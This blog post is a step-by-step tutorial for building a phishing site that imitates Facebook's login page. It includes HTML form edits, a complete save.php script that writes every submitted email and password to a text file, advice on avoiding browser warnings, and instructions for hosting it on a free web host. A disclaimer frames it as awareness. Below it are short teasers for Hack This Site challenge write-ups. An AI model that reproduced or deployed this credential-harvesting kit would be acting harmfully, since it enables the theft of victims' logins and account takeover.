Skip to main content

How to Create a Phishing Site From Scratch

Disclaimer: THIS BLOG IS FOR INFORMING THE RISK CAUSED BY PHISHING AND PLEASE DO NOT USE THIS FOR ILLEGAL PURPOSES.I AM NOT RESPONSIBLE FOR WHAT EVER AFTER EFFECTS YOU FACE IF YOU USE IT IN WRONG WAY!

REQUIREMENT

  • PHP BASICS
  • HTML BASICS
  • Account in free Web host such as 000webhost.com

What is Phishing?


In simple words, phishing is a method of hacking or a method of getting credentials by fooling others by pretending to be some trusted entity.

What we gonna do?


For the sake of example we gonna imitate Facebook and create a login screen similar to them and will fool users to login with it and we get their credentials.

What we need?

For this, the foremost thing we need is a login page similar to Facebook.In most of the tutorials they teach you to save Facebook page and edit it,but i wont recommend you that because if we do so its easy for the server or the browser to warn the users or block our page.So, we will need a fresh webpage. I surfed on the internet and found it in:

http://w3lessons.info/2013/10/17/facebook-style-homepage-design-with-registration-form-login-form-using-css3/

Once you download it we are ready to make our phishing page.Edit the “index.html” file using any text editor.
  • Edit the <title></title> to what ever you want but must be related to facebook (I named it Facebook Themes)
  • Now change <div id=”logo”<a href=”http://w3lessons.info"> W3lessons.info</a> </div> ,change the url to the name of the current webpage, i changed it to “index.html” and the name too,so the code looks like this for me:


<div id=”logo”><a href=”index.html”>FacebookThemes</a> </div>


Now we are into the form,you can see the form starting tag


<form method=”post” action=”” id=”login_form” name=”login_form”>
In this we have to specify what action our form should do , in short,we should divert our form data to some php file to validate and do the necessary steps. So within the quotes after “action=” we should place our php file name.like,
<form method=”post” action=”save.php” id=”login_form” name=”login_form”>
So we have finished our index page, but you can do more editing to the page writings to make it more believable one like above the signup tab you can change “welcome to facebook” and all those to something you want.
NOW SAVE THIS “index.html”
Next step is to create “save.php”,save it on the same directory

save.php

<?php
$handle=fopen(“data.txt”, “a”);
$atim =time();
$atime=date(“dS F Y”, $atim);
fwrite($handle,”\r\n”);
fwrite($handle,”\t\t\t\t\t\t\t HACKED ON:”);
fwrite($handle,$atime);
fwrite($handle,”\r\n”);
fwrite($handle,”\t\t\t\t\t\t======================================================”);
fwrite($handle,”\r\n”);
foreach($_POST as $variable=>$value)
{
fwrite($handle,”\t\t\t\t\t\t\t\t”);
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fwrite($handle,”\t\t\t\t\t\t======================================================”);
fclose($handle);
echo “Invalid E-mail/Password <br>”;
echo “Try Again”;
header(“Refresh:2;url=index.html”);
?>
Next create a text file named “data.txt” on same directory

DONE!

This is the simple phishing site now Host it on any free web hosting services like 000webhost.com

WORKING

The email and password entered in to the index.html will be sent to “save.php”.This php file will saves the email and password to “data.txt”. You can view this data anytime from you server by just opening it!

“REMEMBER NOT TO USE THIS FOR ANY ILLEGAL ACTIVITIES. KNOWLEDGE IS POWER BUT DO NOT MISUSE IT!” 

Comments

Popular posts from this blog

Hack This Site Basic 10

Please enter a password to gain access to level 10 Only this much is written as hint.What we should do? I have tried reading the source code and there is no hint how the password is validated.So,we have no other way than intercepting the data.Once we enter the password and hit submit the password along with some request is sent to the server by the browser.There can be very vital information in this request.What we do is intercept this request before it is sent to the server.For this we use "Burp Suit" or some extensions for tampering data.For chrome and firefox,we have tamper data addon.Iam using chrome add on:  Tamper Chrome HOW TO USE IT? *Right click somewhere and select inspect. *Now select the three arrows pointing right on top right corner. *Now select  Tamper from it(make sure you have added the extension in             chrome). *Now input some password in out mission or leave it empty and hit submit. *You will see a new tab with the request det

Hack This Site Basic 6

Network Security Sam has encrypted his password. The encryption system is publically available and can be accessed with this form: There we have been given with the same encryptor used by Sam .There is no other choice in my mind than guessing the password with the help of this encryptor. We have Sam's encrypted password already :3ff8;j<9 >Now we need to find by giving which value we get the output as 3. >when i given 'a' my output was 'a',which means no change. >So,I tried giving '3' and as expected, answer was 3. >So i pushed my luck and tried '3f',the first two letters,in encryptor ,Output was '3g'    this was clearly giving us hint.first letter has no change,second letter change by one alphabet or           letter ,clearly from 'abcdefg' >with this in mind iam giving input for encryption as '3ed',Huraaah!, it was successful and given output as '3ff'. >now its easy to break down ...

Hack This Site Basic 11

Sam decided to make a music site. Unfortunately he does not understand Apache. This mission is a bit harder than the other basics. As you may have noticed! when we visit this level all we are given with is some line about song.This line changes on each refresh.From this we assume that this is not the real page we need to visit.But how we find our requirement? There is a tool in Kali Linux called 'Dirb'. But for now Iam using an online service for this >> URL FUZZER << . First we give the url and search for files with .php extension. select start scan.Wait for scan to finish. So,we have found a file.Now visit it as: https://www.hackthissite.org/missions/basic/11/index.php There is our login page.still we are stuck!we don't have the password or any hint in the source code of this page. Lets run another scan on the URL Fuzzer ,this time for directories  Same way start scan and wait for it to finish. There are two possible directories